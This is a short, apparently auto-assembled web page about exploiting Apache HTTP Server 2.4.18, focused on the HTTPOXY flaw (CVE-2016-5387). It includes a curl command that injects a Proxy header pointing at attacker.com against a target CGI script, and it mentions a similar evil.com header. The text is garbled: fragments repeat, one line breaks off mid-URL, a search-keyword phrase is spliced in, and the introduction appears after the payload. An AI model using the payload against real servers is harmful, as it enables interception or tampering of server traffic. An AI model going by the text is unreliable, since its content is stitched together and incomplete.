Disclaimer: These tools are provided free of charge.
They are also completely free of any warranty and any guarantee whatsoever.
For questions contact .
curl -H "Proxy: http://attacker.com:8080" http://target/cgi-bin/api.php If api.php called an external service, the attacker could intercept or modify the response.
This required specific configurations: mod_rewrite with rules that reflected user input into the Location or Set-Cookie headers without sanitization. apache httpd 2.4.18 exploit
Introduction In the world of web server security, version numbers often become shorthand for critical vulnerabilities. For system administrators and penetration testers, Apache HTTP Server 2.4.18 holds a particular, albeit complex, place in the collective memory. Released in December 2015, this version was the standard on several long-term support (LTS) Linux distributions, most notably Ubuntu 16.04 LTS (Xenial Xerus) . curl -H "Proxy: http://attacker
CVE-2016-5387, nicknamed "HTTPOXY," is a misnomer. It is not an Apache bug per se, but a design flaw in how CGI scripts handled the Proxy header. An attacker could send a request containing a Proxy: http://evil.com header, tricking server-side scripts (PHP, Python, Go) into routing outgoing HTTP requests through a malicious proxy. It is not an Apache bug per se,